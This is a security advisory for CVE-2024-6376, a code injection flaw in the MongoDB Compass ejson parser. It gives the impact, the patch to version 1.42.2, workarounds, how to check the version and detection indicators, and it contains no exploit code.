CVE-2024-6376
📋 TL;DR
MongoDB Compass versions before 1.42.2 have insufficient sandbox protection in the ejson shell parser used for connection handling, allowing potential code injection. This vulnerability affects users running vulnerable versions of MongoDB Compass, a GUI tool for MongoDB database management. Attackers could potentially execute arbitrary code on systems running the vulnerable Compass software.
💻 Affected Systems
- MongoDB Compass
📦 What is this software?
Compass by Mongodb
⚠️ Risk & Real-World Impact
Worst Case
Remote code execution with the privileges of the Compass user, potentially leading to full system compromise, data exfiltration, or lateral movement within the network.
Likely Case
Local code execution when processing malicious connection strings or documents, potentially allowing privilege escalation or persistence on the affected system.
If Mitigated
Limited impact if Compass runs with minimal privileges and network access is restricted, though code execution within the Compass context remains possible.
🎯 Exploit Status
Exploitation requires user interaction with malicious input in connection handling. No public exploit code available at this time.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.42.2
Vendor Advisory: https://jira.mongodb.org/browse/COMPASS-7496
Restart Required: Yes
Instructions:
1. Download MongoDB Compass version 1.42.2 or later from official MongoDB website. 2. Uninstall previous version. 3. Install the updated version. 4. Restart the application.
🔧 Temporary Workarounds
Restrict Compass Usage
allLimit use of MongoDB Compass to trusted environments and avoid processing untrusted connection strings or documents.
Run with Limited Privileges
allRun MongoDB Compass with minimal user privileges to reduce impact if exploitation occurs.
🧯 If You Can't Patch
- Discontinue use of MongoDB Compass and use alternative MongoDB management tools
- Implement strict input validation for all connection strings and documents processed through Compass
🔍 How to Verify
Check if Vulnerable:
Check Compass version in Help → About menu. If version is below 1.42.2, the system is vulnerable.Check Version:
Not applicable - check via GUI Help → About menuVerify Fix Applied:
After updating, verify version shows 1.42.2 or higher in Help → About menu.📡 Detection & Monitoring
Log Indicators:
- Unusual process creation from Compass executable
- Error logs related to ejson parsing failures
Network Indicators:
- Unexpected outbound connections from Compass process
SIEM Query:
process_name:"MongoDBCompass.exe" AND (process_command_line:*ejson* OR parent_process:unusual)